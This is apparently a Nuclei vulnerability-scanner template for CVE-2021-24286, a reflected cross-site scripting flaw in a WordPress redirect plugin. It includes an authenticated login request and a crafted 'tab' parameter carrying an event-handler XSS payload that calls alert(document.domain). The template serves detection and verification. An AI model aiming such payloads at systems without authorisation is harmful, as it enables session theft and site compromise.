id: CVE-2021-24286 info: name: WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue. remediation: Fixed in version 1.3.1 reference: - https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27 - https://www.exploit-db.com/exploits/50350 - https://nvd.nist.gov/vuln/detail/CVE-2021-24286 - https://wordpress.org/plugins/redirect-404-to-parent/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24286 cwe-id: CWE-79 epss-score: 0.00177 epss-percentile: 0.54724 cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: mooveagency product: redirect_404_to_parent framework: wordpress tags: xss,cve,cve2023,wordpress,wpscan,authenticated,exploitdb,wp-plugin http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers: - type: dsl dsl: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "alert%28document.domain%29") && contains(body_2, "Moove redirect 404")' - 'status_code_2 == 200' condition: and # digest: 490a0046304402203956c2bae14c9a4c05a2f3acab5ea618af9021f7734f2cdba6068f43ea6c23820220693b861597951dffc8318b4829ce4605067392dd8064c3e08c74ebc41e0161a4:922c64590222798bb761d5b6d8e72950